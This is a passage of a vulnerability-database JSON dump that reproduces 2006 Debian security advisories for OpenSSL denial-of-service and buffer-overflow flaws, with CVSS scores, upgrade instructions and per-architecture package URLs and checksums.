"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2022-01-07T13:17:01", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1185-1 security@debian.org\nhttp://www.debian.org/security/ Noah Meyerhans\nSeptember 28th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : openssl\nVulnerability : denial of service\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2006-2940 CVE-2006-3738 CVE-2006-4343 CVE-2006-2937\n\nMultiple vulnerabilities have been discovered in the OpenSSL\ncryptographic software package that could allow an attacker to launch\na denial of service attack by exhausting system resources or crashing\nprocesses on a victim&#x27;s computer.\n\nCVE-2006-2937\n\tDr S N Henson of the OpenSSL core team and Open Network\n\tSecurity recently developed an ASN1 test suite for NISCC\n\t(www.niscc.gov.uk). When the test suite was run against\n\tOpenSSL two denial of service vulnerabilities were discovered.\n\n\tDuring the parsing of certain invalid ASN1 structures an error\n\tcondition is mishandled. This can result in an infinite loop\n\twhich consumes system memory.\n\n\tAny code which uses OpenSSL to parse ASN1 data from untrusted\n\tsources is affected. This includes SSL servers which enable\n\tclient authentication and S/MIME applications.\n\nCVE-2006-3738\n\tTavis Ormandy and Will Drewry of the Google Security Team\n\tdiscovered a buffer overflow in SSL_get_shared_ciphers utility\n\tfunction, used by some applications such as exim and mysql. An\n\tattacker could send a list of ciphers that would overrun a\n\tbuffer.\n\nCVE-2006-4343\n\tTavis Ormandy and Will Drewry of the Google Security Team\n\tdiscovered a possible DoS in the sslv2 client code. Where a\n\tclient application uses OpenSSL to make a SSLv2 connection to\n\ta malicious server that server could cause the client to\n\tcrash.\n\nCVE-2006-2940\n\tDr S N Henson of the OpenSSL core team and Open Network\n\tSecurity recently developed an ASN1 test suite for NISCC\n\t(www.niscc.gov.uk). When the test suite was run against\n\tOpenSSL a DoS was discovered.\n\n\tCertain types of public key can take disproportionate amounts\n\tof time to process. This could be used by an attacker in a\n\tdenial of service attack.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.9.7e-3sarge3.\n\nFor the unstable and testing distributions (sid and etch,\nrespectively), these problems will be fixed in version 0.9.7k-2 of the\nopenssl097 compatibility libraries, and version 0.9.8c-2 of the\nopenssl package.\n\nWe recommend that you upgrade your openssl package. Note that\nservices linking against the openssl shared libraries will need to be\nrestarted. Common examples of such services include most Mail\nTransport Agents, SSH servers, and web servers.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3.dsc\n Size/MD5 checksum: 639 fbf460591348b14103a3819d23164aee\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3.diff.gz\n Size/MD5 checksum: 29882 25e5c57ee6c86d1e4cc335937040f251\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e.orig.tar.gz\n Size/MD5 checksum: 3043231 a8777164bca38d84e5eb2b1535223474\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_alpha.deb\n Size/MD5 checksum: 3341810 73ef8e1cafbfd142a903bd93535a2428\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_alpha.deb\n Size/MD5 checksum: 2448006 b42d228cd1cb48024b25f5bd7c6724b8\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_alpha.deb\n Size/MD5 checksum: 930188 b0b9a46a47a1992ed455f993b6007450\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_amd64.deb\n Size/MD5 checksum: 2693668 7a6d9f9ad43192bcfe9ed22bd4c227cb\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_amd64.deb\n Size/MD5 checksum: 703308 239e07d0029b78d339da49ea8dacb554\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_amd64.deb\n Size/MD5 checksum: 903744 de3413bf58707040d19a606311548ec7\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_arm.deb\n Size/MD5 checksum: 2556374 4f3d5a82ab27e46f6174616dd2f0818c\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_arm.deb\n Size/MD5 checksum: 690118 80812ffefacc7d9800ce5286909aa815\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_arm.deb\n Size/MD5 checksum: 894114 053579483c0d83c11a4b15ade5e09d3b\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_hppa.deb\n Size/MD5 checksum: 2695876 bee86edc3db3ac76a32efb84b1a1cfab\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_hppa.deb\n Size/MD5 checksum: 791316 5dfd66672700232356a26258a76bcffa\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_hppa.deb\n Size/MD5 checksum: 914574 bc996d3cd86b18090ee4c2f3f31dbdbc\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_i386.deb\n Size/MD5 checksum: 2553694 ceea98c69ca44649ee2c98cff0364e4b\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_i386.deb\n Size/MD5 checksum: 2264996 111668559caa8ea95ad3100af67e163e\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_i386.deb\n Size/MD5 checksum: 902750 39b743a6a47517245c3fba9289c86ddf\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_ia64.deb\n Size/MD5 checksum: 3396192 54868b4f5c27f5dc0a65b82594aa8bb0\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_ia64.deb\n Size/MD5 checksum: 1038386 7fcec764f3b3d3ee53588791f7588ad9\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_ia64.deb\n Size/MD5 checksum: 975118 18239f1932f399df0396e81a1e57e5e3\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_m68k.deb\n Size/MD5 checksum: 2317346 cf221d4a25c8913c1183078f1974b46b\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_m68k.deb\n Size/MD5 checksum: 661672 1a1e72d032cbd37400a65ef7ddf9af6d\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_m68k.deb\n Size/MD5 checksum: 889874 6eaaf9b7b9651b37437b78d7a95a562a\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_mips.deb\n Size/MD5 checksum: 2779474 383cc3f4bd2c75515e415c48fc6c66eb\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_mips.deb\n Size/MD5 checksum: 706660 aaa773471c553fd971b3158e35ceb675\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_mips.deb\n Size/MD5 checksum: 896780 21c648b8e817ce098d9d85f311163e34\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_mipsel.deb\n Size/MD5 checksum: 2767338 bc2e40477ad28b1eedb69e6542b1ab08\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_mipsel.deb\n Size/MD5 checksum: 694486 8c31bcea415ae3d725844e45a733d7fe\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_mipsel.deb\n Size/MD5 checksum: 895860 8af869dc9a903f8a226d33cdcffc7eab\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_powerpc.deb\n Size/MD5 checksum: 2775400 91f923d2f4f3938ef8a786b291865f0a\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_powerpc.deb\n Size/MD5 checksum: 779452 3b094894ca6d75b7c86684c7cd62f5bf\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_powerpc.deb\n Size/MD5 checksum: 908316 b93dffc572d91d9e4154b73c57b41e88\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_s390.deb\n Size/MD5 checksum: 2717840 a96fb19009ddc10b1901f34e232109ae\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_s390.deb\n Size/MD5 checksum: 813968 1cf6dbddb023dfe8c55d30d19bc0ff57\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_s390.deb\n Size/MD5 checksum: 918504 73d2f71ec2c8ebd4cc3f481096202664\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge3_sparc.deb\n Size/MD5 checksum: 2630560 059abd03c994e3d6851f38f6f7dd5446\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge3_sparc.deb\n Size/MD5 checksum: 1886038 4900a7af6cbef9e37c902a3c14ac33ac\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge3_sparc.deb\n Size/MD5 checksum: 924472 27f194ff2250fc91d0375c02d6686272\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;", "cvss3": {}, "published": "2006-09-28T17:28:09", "type": "debian", "title": "[SECURITY] [DSA 1185-1] New openssl packages fix denial of service", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2006-09-28T17:28:09", "id": "DEBIAN:DSA-1185-1:2C57C", "href": "https://lists.debian.org/debian-security-announce/2006/msg00279.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T02:09:16", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1195-1 security@debian.org\nhttp://www.debian.org/security/ Noah Meyerhans\nOctober 10, 2006\n- ------------------------------------------------------------------------\n\nPackage : openssl096\nVulnerability : denial of service (multiple)\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2006-2940 CVE-2006-3738 CVE-2006-4343\n\nMultiple vulnerabilities have been discovered in the OpenSSL\ncryptographic software package that could allow an attacker to launch\na denial of service attack by exhausting system resources or crashing\nprocesses on a victim&#x27;s computer.\n\nCVE-2006-3738\n Tavis Ormandy and Will Drewry of the Google Security Team\n discovered a buffer overflow in SSL_get_shared_ciphers utility\n function, used by some applications such as exim and mysql. An\n attacker could send a list of ciphers that would overrun a\n buffer.\n\nCVE-2006-4343\n Tavis Ormandy and Will Drewry of the Google Security Team\n discovered a possible DoS in the sslv2 client code. Where a\n client application uses OpenSSL to make a SSLv2 connection to\n a malicious server that server could cause the client to\n crash.\n\nCVE-2006-2940\n Dr S N Henson of the OpenSSL core team and Open Network\n Security recently developed an ASN1 test suite for NISCC\n (www.niscc.gov.uk). When the test suite was run against\n OpenSSL a DoS was discovered.\n\n Certain types of public key can take disproportionate amounts\n of time to process. This could be used by an attacker in a\n denial of service attack.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.9.6m-1sarge4\n\nThis package exists only for compatibility with older software, and is\nnot present in the unstable or testing branches of Debian.\n\nWe recommend that you upgrade your openssl096 package. Note that\nservices linking against the openssl shared libraries will need to be\nrestarted. Common examples of such services include most Mail\nTransport Agents, SSH servers, and web servers.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian 3.1 (stable)\n- -------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/o/openssl096/openssl096_0.9.6m-1sarge4.diff.gz\n Size/MD5 checksum: 21115 9019caf796eb866f24d5949503b1cdb5\n http://security.debian.org/pool/updates/main/o/openssl096/openssl096_0.9.6m.orig.tar.gz\n Size/MD5 checksum: 2184918 1b63bfdca1c37837dddde9f1623498f9\n http://security.debian.org/pool/updates/main/o/openssl096/openssl096_0.9.6m-1sarge4.dsc\n Size/MD5 checksum: 617 7d60c6c3ecdf502734068ab2a8b32118\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_alpha.deb\n Size/MD5 checksum: 1966534 9f78dcc0f9685641a7fc3d927370d819\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_amd64.deb\n Size/MD5 checksum: 578632 f1574a0058e85cb0e2c6cff996530c97\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_arm.deb\n Size/MD5 checksum: 519304 66fa4a65d803f0115dd80d5359944a2d\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_hppa.deb\n Size/MD5 checksum: 587946 353d46f3351d5a19dfdaf22f605fc627\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_i386.deb\n Size/MD5 checksum: 1756270 2747688d91dfe1cd00430a74bdef6265\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_ia64.deb\n Size/MD5 checksum: 815662 45a5b6503ed631149fea28b37a980e21\n\nm68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_m68k.deb\n Size/MD5 checksum: 477288 da4ddff773fd7d6af0604363719b368a\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_mips.deb\n Size/MD5 checksum: 577284 d2bf3c9d86dbba15bbb9d1cb93a6fc51\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_mipsel.deb\n Size/MD5 checksum: 569246 75d69f033f833b7928a8ca521efb95ea\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_powerpc.deb\n Size/MD5 checksum: 582928 72be71aae8b781ca5a7b1d1b2e738541\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_s390.deb\n Size/MD5 checksum: 602874 e671b41d37d34b7d2055eaca112be269\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_sparc.deb\n Size/MD5 checksum: 1460162 acfb3e17f005c32268fa1def17ea884b\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;", "cvss3": {}, "published": "2006-10-10T20:35:20", "type": "debian", "title": "[SECURITY] [DSA 1195-1] new openssl096 packages fix denial of service", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2006-10-10T20:35:20", "id": "DEBIAN:DSA-1195-1:C6A33", "href": "https://lists.debian.org/debian-security-announce/2006/msg00290.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-08T13:22:17", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1195-1 security@debian.org\nhttp://www.debian.org/security/ Noah Meyerhans\nOctober 10, 2006\n- ------------------------------------------------------------------------\n\nPackage : openssl096\nVulnerability : denial of service (multiple)\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2006-2940 CVE-2006-3738 CVE-2006-4343\n\nMultiple vulnerabilities have been discovered in the OpenSSL\ncryptographic software package that could allow an attacker to launch\na denial of service attack by exhausting system resources or crashing\nprocesses on a victim&#x27;s computer.\n\nCVE-2006-3738\n Tavis Ormandy and Will Drewry of the Google Security Team\n discovered a buffer overflow in SSL_get_shared_ciphers utility\n function, used by some applications such as exim and mysql. An\n attacker could send a list of ciphers that would overrun a\n buffer.\n\nCVE-2006-4343\n Tavis Ormandy and Will Drewry of the Google Security Team\n discovered a possible DoS in the sslv2 client code. Where a\n client application uses OpenSSL to make a SSLv2 connection to\n a malicious server that server could cause the client to\n crash.\n\nCVE-2006-2940\n Dr S N Henson of the OpenSSL core team and Open Network\n Security recently developed an ASN1 test suite for NISCC\n (www.niscc.gov.uk). When the test suite was run against\n OpenSSL a DoS was discovered.\n\n Certain types of public key can take disproportionate amounts\n of time to process. This could be used by an attacker in a\n denial of service attack.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.9.6m-1sarge4\n\nThis package exists only for compatibility with older software, and is\nnot present in the unstable or testing branches of Debian.\n\nWe recommend that you upgrade your openssl096 package. Note that\nservices linking against the openssl shared libraries will need to be\nrestarted. Common examples of such services include most Mail\nTransport Agents, SSH servers, and web servers.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian 3.1 (stable)\n- -------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/o/openssl096/openssl096_0.9.6m-1sarge4.diff.gz\n Size/MD5 checksum: 21115 9019caf796eb866f24d5949503b1cdb5\n http://security.debian.org/pool/updates/main/o/openssl096/openssl096_0.9.6m.orig.tar.gz\n Size/MD5 checksum: 2184918 1b63bfdca1c37837dddde9f1623498f9\n http://security.debian.org/pool/updates/main/o/openssl096/openssl096_0.9.6m-1sarge4.dsc\n Size/MD5 checksum: 617 7d60c6c3ecdf502734068ab2a8b32118\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_alpha.deb\n Size/MD5 checksum: 1966534 9f78dcc0f9685641a7fc3d927370d819\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_amd64.deb\n Size/MD5 checksum: 578632 f1574a0058e85cb0e2c6cff996530c97\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_arm.deb\n Size/MD5 checksum: 519304 66fa4a65d803f0115dd80d5359944a2d\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_hppa.deb\n Size/MD5 checksum: 587946 353d46f3351d5a19dfdaf22f605fc627\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_i386.deb\n Size/MD5 checksum: 1756270 2747688d91dfe1cd00430a74bdef6265\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_ia64.deb\n Size/MD5 checksum: 815662 45a5b6503ed631149fea28b37a980e21\n\nm68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_m68k.deb\n Size/MD5 checksum: 477288 da4ddff773fd7d6af0604363719b368a\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_mips.deb\n Size/MD5 checksum: 577284 d2bf3c9d86dbba15bbb9d1cb93a6fc51\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_mipsel.deb\n Size/MD5 checksum: 569246 75d69f033f833b7928a8ca521efb95ea\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_powerpc.deb\n Size/MD5 checksum: 582928 72be71aae8b781ca5a7b1d1b2e738541\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_s390.deb\n Size/MD5 checksum: 602874 e671b41d37d34b7d2055eaca112be269\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge4_sparc.deb\n Size/MD5 checksum: 1460162 acfb3e17f005c32268fa1def17ea884b\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;", "cvss3": {}, "published": "2006-10-10T20:35:20", "type": "debian", "title": "[SECURITY] [DSA 1195-1] new openssl096 packages fix denial of service", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2006-10-10T20:35:20", "id": "DEBIAN:DSA-1195-1:12A42", "href": "https://lists.debian.org/debian-security-announce/2006/msg00290.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T13:34:49", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1185-2 security@debian.org\nhttp://www.debian.org/security/ Noah Meyerhans\nOctober 2nd, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : openssl\nVulnerability : denial of service\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2006-2940\n\nThe fix used to correct CVE-2006-2940 introduced code that could lead to\nthe use of uninitialized memory. Such use is likely to cause the\napplication using the openssl library to crash, and has the potential to\nallow an attacker to cause the execution of arbitrary code.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.9.7e-3sarge4.\n\nFor the unstable and testing distributions (sid and etch,\nrespectively), these problems will be fixed in version 0.9.7k-3 of the\nopenssl097 compatibility libraries, and version 0.9.8c-3 of the\nopenssl package.\n\nWe recommend that you upgrade your openssl package. Note that\nservices linking against the openssl shared libraries will need to be\nrestarted. Common examples of such services include most Mail\nTransport Agents, SSH servers, and web servers.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4.dsc\n Size/MD5 checksum: 639 179f34093d860afff66964b5f1c99ee3\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4.diff.gz\n Size/MD5 checksum: 29707 0b4d462730327aba5a751bd4bec71c10\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e.orig.tar.gz\n Size/MD5 checksum: 3043231 a8777164bca38d84e5eb2b1535223474\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_alpha.deb\n Size/MD5 checksum: 3341886 f0d0ef51fac89227b0d0705116439f5c\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_alpha.deb\n Size/MD5 checksum: 2448092 8065c52c7649f36221f8a48adfb4cb29\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_alpha.deb\n Size/MD5 checksum: 930234 5953c4c4a45352d41c3c414eda63ff00\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_amd64.deb\n Size/MD5 checksum: 2693980 cbd25bbed17ec73561337bfc3d8ed2ed\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_amd64.deb\n Size/MD5 checksum: 769904 2671cdf2f48013617ea509daac2bb4dc\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_amd64.deb\n Size/MD5 checksum: 903782 e370684d7c84d1eebcb69cdda35c6c6c\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_arm.deb\n Size/MD5 checksum: 2556330 75c1a253ddad0b7ad87053552770e5c4\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_arm.deb\n Size/MD5 checksum: 690202 ccd435ca2c183940152f3bd70d84ee0b\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_arm.deb\n Size/MD5 checksum: 894144 2e5caaa90184d9ee9e607d18728e6f93\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_hppa.deb\n Size/MD5 checksum: 2695990 58fe1a247ef47faa559eef610b437db6\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_hppa.deb\n Size/MD5 checksum: 791382 f0c64d06307af937218944d6d8db6e2f\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_hppa.deb\n Size/MD5 checksum: 914576 631c681a3c4ce355962a7c684767a155\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_i386.deb\n Size/MD5 checksum: 2554956 c4c9aa14e74dbd6dac2cadd7cf48b522\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_i386.deb\n Size/MD5 checksum: 2265180 9047b6c6036c048ad75fa397f220ae39\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_i386.deb\n Size/MD5 checksum: 906268 070d1d1680f90da5509121c44de7a254\n\n Intel IA-64 architecture:\n\n 